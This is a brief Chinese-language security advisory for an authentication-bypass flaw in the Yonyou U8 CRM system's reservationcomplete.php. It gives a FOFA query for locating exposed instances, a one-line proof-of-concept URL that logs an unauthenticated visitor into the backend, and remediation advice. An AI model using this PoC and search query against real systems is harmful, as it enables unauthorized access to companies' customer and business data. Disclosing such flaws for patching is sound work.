用友U8?CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。
用友 U8 CRM客户关系管理系统?reservationcomplete.php文件存在逻辑漏洞,未授权的攻击者通过漏洞可以直接登录后台,获取系统内部敏感信息,使系统处于极不安全状态。
FOFA:app="用友U8CRM"
PoC
/background/reservationcomplete.php?ID=1
拼接url访问页面接口,重新访问首页即可登录?
关闭互联网暴露面删除或修改相关功能模块代码?
升级至安全版本